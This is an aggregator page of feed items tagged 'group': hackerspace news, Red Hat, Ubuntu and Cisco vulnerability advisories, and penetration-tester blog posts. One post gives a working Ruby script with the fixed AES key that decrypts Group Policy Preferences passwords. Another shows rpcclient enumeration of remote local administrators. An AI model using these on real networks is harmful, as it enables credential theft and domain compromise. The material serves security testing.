157 items tagged "group"
-
-
4:01
»
Hack a Day
The etsy of electronics project, Tindie, has a brand new feature: It’s a Kickstarter-esque endeavor called a Fundraiser that allows you to sell your projects to other electron enthusiasts. Of course the new Tindie Fundraisers may soon be just another Kickstarter clone for “exciting,” “new,” and “innovative” Arduino dev boards, something we’ve lamented before. We’re really interested in seeing [...]
-
-
16:00
»
SecuriTeam
MoinMoin is prone to a security-bypass vulnerability because a group containing a virtual group fails to evaluate the ACL rules correctly.
-
-
11:01
»
Hack a Day
This year for Halloween, The Geek Group, decided to take a very different approach to outreach. Instead of making animatronics, or converting their giant (seriously HUGE) space into a haunted house, they held an event called “Computers Not Candy” where they teamed up with a large local company to bring 100 tablet computers to 100 [...]
-
-
11:26
»
SecDocs
Authors: Markus Beckedahl, Ralf Bendrath
Tags: social
Event: Chaos Communication Camp 2003
Abstract: The World Summit on the Information Society (WSIS) is the latest in a long series of world summits organized by the United Nations that deal with central questions of humanity like the environment, women's rights, development, climate change, etc. At the WSIS, information and communication are on the agenda for the first time. The world summit is supposed to develop a common understanding of the information society. In Germany, a WSIS working group initiated by the Network New Media has been meeting continuously since summer 2002. The group has debated the themes of the WSIS, developed civil society positions and planned own interventions. Since January 2003, three open meetings of this working group with members of other non-governmental organizations, alternative media and scientific institutions have been held in Berlin. The working group was expanded and officially established as the "German Civil Society Coordinating Group for WSIS". Delegates of the group have attended important European and world-wide preparatory conferences. They monitor the developments and try to influence the agenda in favor of civil society demands. Single members of the working group are engaged in the sub-committees and caucuses of the international Civil Society Plenary Coordination Group. For the worldwide preparatory meeting in Paris in July, the group sent Georg Greve, President of the Free Software Foundation, Europe, as a civil society delegate into the German governmental delegation. Other members of the group are involved in the counter and alternative summit activities that are currently being planned by media and computer activists, such as the Polymedia lab or the World Forum on Communication Rights. In this panel at the ccc-camp we want to talk about and discuss the topics of the WSIS. What is going on globally and which positions do the different Players like governments, civil society and business have? What are the positions, campaigns and activities of the global civil society? What is happening especially in Germany? How can civil society use the attention while the WSIS is going on to transport alternative topics like freedoms of information, free software and human rights in the information society?
-
-
6:00
»
Carnal0wnage
So I put this link out on Twitter but forgot to put it on the blog.
I did a talk at the Oct 2012 NovaHackers meeting on exploiting 2008 Group Policy Preferences (GPP) and how they can be used to set local users and passwords via group policy.
I've run into this on a few tests where people are taking advantage of this extremely handy feature to set passwords across the whole domain, and then allowing users or attackers the ability to decrypt these passwords and subsequently 0wning everything :-)
So here are the slides:
Exploiting Group Policy Preferences from chrisgates
Blog post explaining the issue in detail:
http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
Metasploit post module:
http://metasploit.com/modules/post/windows/gather/credentials/gpp
PowerShell module to do it:
http://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
I ended up writing some ruby to do it (the blog post has some python) because the metasploit module was downloading the xml file to loot but taking a poop prior to getting to the decode part. Now you can do it yourself:
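require 'openssl'
require 'base64'

encrypted_data = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"

def decrypt(encrypted_data)
  # cpassword values are stored with their base64 padding stripped; restore it
  # (no padding is added when the length is already a multiple of 4)
  padding = "=" * ((4 - (encrypted_data.length % 4)) % 4)
  epassword = "#{encrypted_data}#{padding}"
  decoded = Base64.decode64(epassword)
  # 32-byte AES key, identical for every GPP cpassword value
  key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
  # OpenSSL::Cipher::Cipher is gone from current Ruby; OpenSSL::Cipher replaces it
  aes = OpenSSL::Cipher.new("AES-256-CBC")
  aes.decrypt
  aes.key = key
  # All-zero IV, set explicitly instead of relying on the library default
  aes.iv = "\x00" * 16
  plaintext = aes.update(decoded)
  plaintext << aes.final
  # The plaintext is UTF-16LE; keep the low byte of each code unit
  pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion
  return pass
end

blah = decrypt(encrypted_data)
puts blah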
In Action:
user@ubuntu:~$ ruby gpp-decrypt-string.rb
Local*P4ssword!
-
-
9:00
»
Hack a Day
For [Ern]’s MEng group project, his group had to develop a robotics platform capable of achieving some end goal. Because innovation is a large part of the grade, [Ern] convinced his team members to work with a brain controlled interface and build a mind controlled robotics platform. For wont of having an easy build, [Ern] [...]
-
-
18:31
»
Packet Storm Security Advisories
Red Hat Security Advisory 2012-1206-01 - Python Paste provides middleware for building and running Python web applications. The python-paste-script package includes paster, a tool for working with and running Python Paste applications. It was discovered that paster did not drop supplementary group privileges when started by the root user. Running "paster serve" as root to start a Python web application that will run as a non-root user and group resulted in that application running with root group privileges. This could possibly allow a remote attacker to gain access to files that should not be accessible to the application.
-
-
6:01
»
Hack a Day
We’re very familiar with the Louisville Hackerspace LVL1 here at Hackaday. From their GLaDOS-inspired sentient overlord, an evil box to filter the Internet, and a friggin’ moat, LVL1 is the closest we’ve got to a mad scientist heard cackling from a wind-swept castle on a stormy night. It turns out they also have a rocketry program. [...]
-
-
13:01
»
Hack a Day
We’re happy to see some links rolling in from our call for Hackerspace introductions. This is sort of a reintroduction of The Geek Group. They’ve been around for a while and we’ve featured several interesting projects coming out of the collective (check out this pulse capacitor autopsy). You may remember some tax woes they ran into [...]
-
-
7:29
»
Packet Storm Security Advisories
Red Hat Security Advisory 2012-0306-03 - Kerberos is a network authentication system which allows clients and servers to authenticate to each other using symmetric encryption and a trusted third-party, the Key Distribution Center. It was found that ftpd, a Kerberos-aware FTP server, did not properly drop privileges. On Red Hat Enterprise Linux 5, the ftpd daemon did not check for the potential failure of the effective group ID change system call. If the group ID change failed, a remote FTP user could use this flaw to gain unauthorized read or write access to files that are owned by the root group.
-
-
7:46
»
Packet Storm Security Exploits
Dow Group suffers from multiple remote SQL injection vulnerabilities in dynamic.php, news_desc.php, product.php, and solutions.php.
-
-
18:39
»
SecuriTeam
Cisco IPSec VPN Implementation suffers from a Group Name Enumeration Vulnerability.
-
-
14:26
»
Packet Storm Security Advisories
The Cisco IPSec VPN implementation suffers from a group name enumeration vulnerability. Systems affected include the ASA 5500 Series Adaptive Security Appliances, Cisco PIX 500 Series Security Appliances, Cisco VPN 3000 Series Concentrators.
-
-
13:12
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2011-018 - A patch for parse.c in sudo does not properly interpret a system group in the sudoers file during authorization decisions for a user who belongs to that group, which allows local users to leverage an applicable sudoers file and gain root privileges via a sudo command. NOTE: this vulnerability exists because of a CVE-2009-0034 regression. check.c in sudo 1.7.x before 1.7.4p5, when a Runas group is configured, does not require a password for command execution that involves a gid change but no uid change, which allows local users to bypass an intended authentication requirement via the -g option to a sudo command.
-
-
18:29
»
Packet Storm Security Advisories
Ubuntu Security Notice 1046-1 - Alexander Kurtz discovered that sudo would not prompt for a password when a group was specified in the Runas_Spec. A local attacker could exploit this to execute arbitrary code as the specified group if sudo was configured to allow the attacker to use a program as this group. The group Runas_Spec is not used in the default installation of Ubuntu.
-
-
16:24
»
Packet Storm Security Advisories
NGS Secure has discovered an enumeration vulnerability in (Cisco) Cisco VPN Concentrator, Cisco PIX and Cisco Adaptive Security Appliance.
-
-
14:50
»
SecuriTeam
A vulnerability in the Internet Group Management Protocol (IGMP) version 3 implementation of Cisco IOS Software and Cisco IOS XE Software allows a remote unauthenticated attacker to cause a reload of an affected device.
-
-
12:00
»
Hack a Day
This is the Pinta, an autonomous sailboat built to attempt an ocean crossing from Ireland to Martinique (in the Caribbean). A group of researchers at Aberystwyth University built her as part of the Microtransat Challenge. To keep tabs on the vessel her creators included an Iridium short burst data modem with a backup system made from a SPOT [...]
-
-
23:02
»
Packet Storm Security Recent Files
Ubuntu Security Notice 983-1 - Markus Wuethrich discovered that sudo did not always verify the user when a group was specified in the Runas_Spec. A local attacker could exploit this to execute arbitrary code as root if sudo was configured to allow the attacker to use a program as a group when the attacker was not a part of that group.
-
-
11:00
»
Hack a Day
PCB Group Orders [Phil] wrote in to let us know about the DorkbotPDX group orders. The site makes group PCB orders until a cutoff date or the panel is full. You get three copies of your design with no setup fee for just $5/square inch including domestic postage. Not a bad price. We aren’t affiliated [...]
-
-
19:11
»
Carnal0wnage
Got asked to help remotely locate local admins on boxes on a network.
rpcclient $> enumalsgroups
Usage: enumalsgroups builtin|domain [access mask]
rpcclient $> enumalsgroups builtin
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Guests] rid:[0x222]
group:[Network Configuration Operators] rid:[0x22c]
group:[Power Users] rid:[0x223]
group:[Remote Desktop Users] rid:[0x22b]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]
Now you would think that doing a querygroup would give you the right output, but actually you get a:
rpcclient $> querygroup 0x220
result was NT_STATUS_NO_SUCH_GROUP
Honestly I have no idea why this doesn't work, it *should*. If anyone knows why it doesn't I know more than one person who would like to know.
Anyway it takes one more step but you can do it this way:
rpcclient $> queryaliasmem
Usage: queryaliasmem builtin|domain rid [access mask]
rpcclient $> queryaliasmem builtin 0x220
sid:[S-1-5-21-1214440339-1383384898-839522115-500]
sid:[S-1-5-21-1214440339-1383384898-839522115-1003]
sid:[S-1-5-21-2392188729-2485841371-4291725810-512]
Then you can look up who those SIDs belong to
rpcclient $> lookupsids
Usage: lookupsids [sid1 [sid2 [...]]]
rpcclient $> lookupsids S-1-5-21-1214440339-1383384898-839522115-500
S-1-5-21-1214440339-1383384898-839522115-500 PC\Administrator (1)
rpcclient $> lookupsids S-1-5-21-1214440339-1383384898-839522115-1003
S-1-5-21-1214440339-1383384898-839522115-1003 PC\user (1)
rpcclient $> lookupsids S-1-5-21-2392188729-2485841371-4291725810-512
rpc_api_pipe: Remote machine 192.168.242.128 pipe \lsarpc fnum 0x4001 returned critical error. Error was Call timed out: server did not respond after 10000 milliseconds
result was NT_STATUS_IO_TIMEOUT
Not sure about the 512 (it's a MS built-in account I think) but the 1003 was the user I added to the local admins group.
-
-
11:02
»
Hack a Day
Non-profit hackerspace The Geek Group has been hit with a hefty tax bill despite their tax-exempt status. We featured a boom camera built by the organization back in November. It is the goal of The Geek Group to fulfill the thirst to explore and create by providing facilities, peer group, and camaraderie that make knowledge [...]
-
-
7:58
»
Hack a Day
Here at HackaDay, we are always a fan of a group of hackers coming together to create a place to share ideas, tools, parts, and stories. A group from St. Louis called Arch Reactor have managed to secure a new location, and are having their grand opening this Saturday. From 4-10pm on the 30th, they [...]
-
-
14:10
»
remote-exploit & backtrack
A few years ago I did the A+ and recently I took the MCDST as I managed to get it free as we set up a Microsoft testing centre. I am now working as a desktop support technician in a hospital and am learning a lot. I am however becoming frustrated as I really want to learn more about group policy and the server/administration side of things, which comes into play a lot.
A few years ago I got a complete set of books which is Windows 2000 MCSE. I was just going to dig them out, however is it worth my while reading them or have things changed too much now since Server 2003?
I have no more training resource available so I guess I'm looking for pointers from someone with systems experience to learn about domains, workgroup environments and admin/group policy.